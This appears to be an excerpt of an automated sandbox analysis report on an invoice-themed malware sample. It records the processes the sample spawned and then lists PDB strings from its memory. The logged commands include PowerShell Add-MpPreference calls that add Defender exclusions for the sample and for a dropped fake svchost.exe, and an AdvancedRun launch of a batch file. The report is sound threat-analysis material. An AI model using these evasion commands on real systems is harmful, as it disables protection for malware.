        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' -ForceJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess created: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /RunJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe' -ForceJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1Jump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe' /SpecialRun 4101d8 5380Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
        Source: C:\Windows\explorer.exeProcess created: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe'
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' -Force
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
        Source: C:\Windows\explorer.exeProcess created: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe'
        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 5604 -ip 5604
        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 2060
        Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
        Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess created: unknown unknown
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess created: unknown unknown
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess created: unknown unknown
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess created: unknown unknown
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess created: unknown unknown
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess created: unknown unknown
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess created: unknown unknown
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess created: unknown unknown
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32Jump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
        Source: CN-Invoice-XXXXX9808-19011143287990.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
        Source: CN-Invoice-XXXXX9808-19011143287990.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
        Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdbo source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.534442041.0000000007F9F000.00000004.00000001.sdmp
        Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: System.ni.pdb% source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: Microsoft.VisualBasic.pdbx source: WerFault.exe, 0000001E.00000002.453753252.00000000059A0000.00000004.00000001.sdmp
        Source: Binary string: crypt32.pdbb440 source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000001E.00000003.353447648.0000000005681000.00000004.00000001.sdmp
        Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: onfiguration.ni.pdb source: WerFault.exe, 0000001E.00000003.353674656.00000000057FC000.00000004.00000001.sdmp
        Source: Binary string: mscorlib.pdb>)^ source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000001E.00000003.354144153.00000000057E0000.00000004.00000040.sdmp
        Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000001E.00000003.353447648.0000000005681000.00000004.00000001.sdmp
        Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000001E.00000003.353447648.0000000005681000.00000004.00000001.sdmp
        Source: Binary string: wntdll.pdb source: WerFault.exe, 0000001E.00000003.353447648.0000000005681000.00000004.00000001.sdmp
        Source: Binary string: ml.pdb source: WerFault.exe, 0000001E.00000003.353674656.00000000057FC000.00000004.00000001.sdmp
        Source: Binary string: winnsi.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: .ni.pdb source: WerFault.exe, 0000001E.00000003.353674656.00000000057FC000.00000004.00000001.sdmp
        Source: Binary string: clr.pdb source: WerFault.exe, 0000001E.00000003.354144153.00000000057E0000.00000004.00000040.sdmp
        Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: ility.pdb source: WerFault.exe, 0000001E.00000003.353674656.00000000057FC000.00000004.00000001.sdmp
        Source: Binary string: advapi32.pdb source: WerFault.exe, 0000001E.00000003.353447648.0000000005681000.00000004.00000001.sdmp
        Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000001E.00000003.353447648.0000000005681000.00000004.00000001.sdmp
        Source: Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: Microsoft.VisualBasic.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: fwpuclnt.pdb\4B0 source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: ntmarta.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: urlmon.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 0000001E.00000002.453753252.00000000059A0000.00000004.00000001.sdmp
        Source: Binary string: dhcpcsvc.pdbZ4\0 source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: mscorlib.pdb+_ source: WerFault.exe, 0000001E.00000003.353042308.00000000057F5000.00000004.00000040.sdmp
        Source: Binary string: System.ni.pdbT3Zl source: WerFault.exe, 0000001E.00000002.453753252.00000000059A0000.00000004.00000001.sdmp
        Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000001E.00000003.353447648.0000000005681000.00000004.00000001.sdmp
        Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000001E.00000003.352878832.00000000057E2000.00000004.00000040.sdmp
        Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: winnsi.pdb03 source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.534442041.0000000007F9F000.00000004.00000001.sdmp
        Source: Binary string: fltLib.pdbJ source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: cryptbase.pdb= source: WerFault.exe, 0000001E.00000003.353447648.0000000005681000.00000004.00000001.sdmp
        Source: Binary string: Microsoft.VisualBasic.pdb@! source: WERCCD7.tmp.dmp.30.dr
        Source: Binary string: \??\C:\Windows\mscorlib.pdb source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.534442041.0000000007F9F000.00000004.00000001.sdmp
        Source: Binary string: dwmapi.pdbF source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: System.Xml.pdbx source: WerFault.exe, 0000001E.00000002.453753252.00000000059A0000.00000004.00000001.sdmp
        Source: Binary string: indows.Forms.pdb source: WerFault.exe, 0000001E.00000003.353674656.00000000057FC000.00000004.00000001.sdmp
        Source: Binary string: i.pdb source: WerFault.exe, 0000001E.00000003.353586234.0000000005698000.00000004.00000001.sdmp
        Source: Binary string: dwmapi.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: indows.Forms.pdb&& source: WerFault.exe, 0000001E.00000003.353674656.00000000057FC000.00000004.00000001.sdmp
        Source: Binary string: mscoree.pdb source: WerFault.exe, 0000001E.00000003.353447648.0000000005681000.00000004.00000001.sdmp
        Source: Binary string: iphlpapi.pdb@4V0 source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: ility.pdbn source: WerFault.exe, 0000001E.00000003.353674656.00000000057FC000.00000004.00000001.sdmp
        Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: shlwapi.pdbk source: WerFault.exe, 0000001E.00000003.352878832.00000000057E2000.00000004.00000040.sdmp
        Source: Binary string: msvcp_win.pdbR source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: nsi.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: psapi.pdbX source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: powrprof.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: mscorlib.ni.pdbRSDS source: WERCCD7.tmp.dmp.30.dr
        Source: Binary string: ole32.pdbT source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: System.Configuration.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: ole32.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: iertutil.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 0000001E.00000002.453753252.00000000059A0000.00000004.00000001.sdmp
        Source: Binary string: msasn1.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: mscorlib.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: WWCN-Invoice-XXXXX9808-19011143287990.PDB[[ source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.460006260.00000000004F8000.00000004.00000010.sdmp
        Source: Binary string: comctl32v582.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: System.Drawing.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: combase.pdb source: WerFault.exe, 0000001E.00000003.352878832.00000000057E2000.00000004.00000040.sdmp
        Source: Binary string: iVisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.460006260.00000000004F8000.00000004.00000010.sdmp
        Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WERCCD7.tmp.dmp.30.dr
        Source: Binary string: Accessibility.pdbx source: WerFault.exe, 0000001E.00000002.453753252.00000000059A0000.00000004.00000001.sdmp
        Source: Binary string: apphelp.pdb source: WerFault.exe, 0000001E.00000003.353447648.0000000005681000.00000004.00000001.sdmp
        Source: Binary string: System.Xml.ni.pdbRSDS source: WERCCD7.tmp.dmp.30.dr
        Source: Binary string: System.Configuration.pdb`Q) source: WERCCD7.tmp.dmp.30.dr
        Source: Binary string: rasadhlp.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: ml.ni.pdb source: WerFault.exe, 0000001E.00000003.353674656.00000000057FC000.00000004.00000001.sdmp
        Source: Binary string: profapi.pdb` source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: System.Core.ni.pdbRSDSD source: WERCCD7.tmp.dmp.30.dr
        Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: diasymreader.pdb_ source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: Accessibility.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: shell32.pdb, source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: rawing.pdb source: WerFault.exe, 0000001E.00000003.353674656.00000000057FC000.00000004.00000001.sdmp
        Source: Binary string: rasman.pdbN4P0 source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: mscoreei.pdbk source: WerFault.exe, 0000001E.00000003.352878832.00000000057E2000.00000004.00000040.sdmp
        Source: Binary string: version.pdbz source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: mscorlib.pdbx source: WerFault.exe, 0000001E.00000002.453753252.00000000059A0000.00000004.00000001.sdmp
        Source: Binary string: t.VisualBasic.pdb source: WerFault.exe, 0000001E.00000003.353674656.00000000057FC000.00000004.00000001.sdmp
        Source: Binary string: Accessibility.pdb>)^ source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: shcore.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: System.Core.ni.pdb% source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: Accessibility.pdbT source: WERCCD7.tmp.dmp.30.dr
        Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000001E.00000003.354144153.00000000057E0000.00000004.00000040.sdmp
        Source: Binary string: System.Core.ni.pdb" source: WerFault.exe, 0000001E.00000003.353586234.0000000005698000.00000004.00000001.sdmp
        Source: Binary string: fltLib.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: shell32.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: wimm32.pdb* source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: dnsapi.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: rasapi32.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: wimm32.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: System.Xml.ni.pdbT source: WerFault.exe, 0000001E.00000002.453753252.00000000059A0000.00000004.00000001.sdmp
        Source: Binary string: diasymreader.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: winhttp.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: Windows.StateRepositoryPS.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: dhcpcsvc6.pdb>3 source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: mscorlib.ni.pdb% source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdbgl source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.534358038.0000000007F80000.00000004.00000001.sdmp
        Source: Binary string: rtutils.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: System.pdbx source: WerFault.exe, 0000001E.00000002.453753252.00000000059A0000.00000004.00000001.sdmp
        Source: Binary string: HcC:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.PDB4 source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.460006260.00000000004F8000.00000004.00000010.sdmp
        Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: profapi.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.519819343.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe, 00000008.00000000.260198849.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000009.00000002.271092950.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000027.00000000.419368466.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.22.dr
        Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000001E.00000003.354144153.00000000057E0000.00000004.00000040.sdmp
        Source: Binary string: WLDP.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: sechost.pdb source: WerFault.exe, 0000001E.00000003.353447648.0000000005681000.00000004.00000001.sdmp
        Source: Binary string: System.ni.pdbRSDS source: WERCCD7.tmp.dmp.30.dr
        Source: Binary string: clrjit.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: cryptsp.pdb?9W source: WerFault.exe, 0000001E.00000003.354208449.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: wUxTheme.pdbL source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: rasman.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: propsys.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdbows source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.534442041.0000000007F9F000.00000004.00000001.sdmp
        Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.534442041.0000000007F9F000.00000004.00000001.sdmp
        Source: Binary string: wmswsock.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: version.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: onfiguration.pdb source: WerFault.exe, 0000001E.00000003.353674656.00000000057FC000.00000004.00000001.sdmp
        Source: Binary string: O.pdb? source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.460006260.00000000004F8000.00000004.00000010.sdmp
        Source: Binary string: wintrust.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: powrprof.pdb| source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: System.Xml.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: oleaut32.pdbn source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: System.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: iertutil.pdbV4H0 source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000001E.00000003.354144153.00000000057E0000.00000004.00000040.sdmp
        Source: Binary string: psapi.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: bcrypt.pdbv source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000001E.00000003.353447648.0000000005681000.00000004.00000001.sdmp
        Source: Binary string: System.Drawing.pdb| source: WERCCD7.tmp.dmp.30.dr
        Source: Binary string: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.PDB source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.460006260.00000000004F8000.00000004.00000010.sdmp
        Source: Binary string: cldapi.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: System.Core.pdbx source: WerFault.exe, 0000001E.00000002.453753252.00000000059A0000.00000004.00000001.sdmp
        Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000001E.00000003.352878832.00000000057E2000.00000004.00000040.sdmp
        Source: Binary string: mscoreei.pdb source: WerFault.exe, 0000001E.00000003.352878832.00000000057E2000.00000004.00000040.sdmp
        Source: Binary string: System.Drawing.pdbx source: WerFault.exe, 0000001E.00000002.453753252.00000000059A0000.00000004.00000001.sdmp
        Source: Binary string: System.Core.pdb source: WerFault.exe, 0000001E.00000003.353586234.0000000005698000.00000004.00000001.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: combase.pdbk source: WerFault.exe, 0000001E.00000003.352878832.00000000057E2000.00000004.00000040.sdmp
        Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 0000001E.00000002.453753252.00000000059A0000.00000004.00000001.sdmp
        Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: bcryptprimitives.pdbk source: WerFault.exe, 0000001E.00000003.352878832.00000000057E2000.00000004.00000040.sdmp
        Source: Binary string: wuser32.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdbgl0.Y source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.534358038.0000000007F80000.00000004.00000001.sdmp
        Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbqR source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.534358038.0000000007F80000.00000004.00000001.sdmp
        Source: Binary string: System.Xml.pdb@ source: WERCCD7.tmp.dmp.30.dr
        Source: Binary string: System.ni.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: edputil.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: crypt32.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp

        Data Obfuscation:

        barindex
        Binary contains a suspicious time stampShow sources
